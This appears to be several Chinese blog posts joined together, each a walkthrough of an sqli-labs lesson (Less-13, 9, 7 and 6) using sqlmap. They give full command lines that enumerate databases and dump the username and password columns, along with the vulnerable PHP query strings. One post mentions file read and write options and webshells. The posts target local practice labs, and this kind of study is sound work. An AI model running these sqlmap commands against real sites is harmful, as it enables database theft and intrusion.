目录

类型

获取数据库

查看源代码

类型

双层-单引号及括号

获取数据库

python sqlmap.py -u "http://192.168.31.12/sqli-labs_1/Less-13/" --forms --dbms mysql --answers="extending=N" --threads 8 -dbs --batch

 







--forms参数还是比较快的，针对POST表单有三种方式，可以查看网络安全-sqlmap实战之sqlilabs-Less11中的小总结

 之后的获取表名，列名及内容就不写了，还是-D、--tables、-T、--columns、-C、-dump、--dump-fomat参数

优化的话可以使用--technique BEU，基于时间的注入还是比较浪费时间的。

查看源代码

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";

 更多内容查看：网络安全-自学笔记

喜欢本文的请动动小手点个赞，收藏一下，有问题请下方评论，转载请注明出处，并附有原文链接，谢谢！如有侵权，请及时联系。如果您感觉有所收获，自愿打赏，可选择支付宝18833895206（小于），您的支持是我不断更新的动力。

目录

 

类型

-dbs枚举数据库

--tables枚举数据库表

--columns枚举列

--dump枚举数据

查看源代码

类型

时间盲注-单引号

-dbs枚举数据库

使用-o参数优化,,--technique参数指定技术，--batch参数进行跳过

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" -o --technique T -dbs --batch




python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T -dbs --batch

太慢，继续优化

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -dbs --batch




这还运行了6分钟，有小伙伴可以更快吗?下方评论，十分感谢！

--tables枚举数据库表

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security --tables --batch




--columns枚举列

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security -T users --columns --batch

 




--dump枚举数据

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security -T users -C username,password --dump --batch

 




查看源代码

$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

更多内容查看：网络安全-自学笔记

有问题请下方评论，转载请注明出处，并附有原文链接，谢谢！如有侵权，请及时联系。

目录

类型

-dbs枚举数据库

--tables枚举数据库表

--columns枚举列

--dump枚举数据

查看源代码

类型

文件读写




-dbs枚举数据库

使用-o参数优化,--threads 添加多线程,--dbms指定数据库, --technique指定注入技术

python sqlmap.py -u "http://127.0.0.1/sqli-labs_2/sqlilabs/Less-7/?id=1" -o --dbms mysql --threads 8 --technique BEU -dbs







 用时一分钟，速度还可以。

--tables枚举数据库表

python sqlmap.py -u "http://127.0.0.1/sqli-labs_2/sqlilabs/Less-7/?id=1" -o --dbms mysql --threads 8 --technique BEU -D security --tables




--columns枚举列

python sqlmap.py -u "http://127.0.0.1/sqli-labs_2/sqlilabs/Less-7/?id=1" -o --dbms mysql --threads 8 --technique BEU -D security -T users --columns

 




--dump枚举数据

python sqlmap.py -u "http://127.0.0.1/sqli-labs_2/sqlilabs/Less-7/?id=1" -o --dbms mysql --threads 8 --technique BEU -D security -T users -C username,password --dump




查看源代码

SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1

这节Less发的比较晚，因为他提示使用outfile，作者应该是想让我们练习使用outfile函数，sqlmap似乎没有写入文件的，有--file-write和--file-dest进行文件上传，--file-read进行读文件。有的其他文章使用一句话木马加中国菜刀的方式也不错，我不太清楚sqlmap是否对outfile函数进行了集成，读了官方文档确实没有找到。

更多内容查看：网络安全-自学笔记

喜欢本文的请动动小手点个赞，收藏一下，有问题请下方评论，转载请注明出处，并附有原文链接，谢谢！如有侵权，请及时联系。如果您感觉有所收获，自愿打赏，可选择支付宝18833895206（小于），您的支持是我不断更新的动力

目录

类型

-dbs枚举数据库

--tables枚举数据库表

--columns枚举列

--dump枚举数据

查看源代码

类型

双引号注入




猜测sql语句

select * from users where id = ("参数") LIMIT 0,1

-dbs枚举数据库

使用-o参数优化,--batch参数进行跳过,--technique参数指定注入技术

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-6/?id=1" --technique E -o -dbs --batch




--tables枚举数据库表

添加--dbms参数

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-6/?id=1" --dbms mysql --technique E -o -D security --tables --batch

 




--columns枚举列

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-6/?id=1" --dbms mysql --technique E -o -D security -T users --columns --batch

 




--dump枚举数据

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-6/?id=1" --dbms mysql --technique E -o -D security -T users -C username,password --dump --batch




查看源代码

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

更多内容查看：网络安全-自学笔记

有问题请下方评论，转载请注明出处，并附有原文链接，谢谢！如有侵权，请及时联系。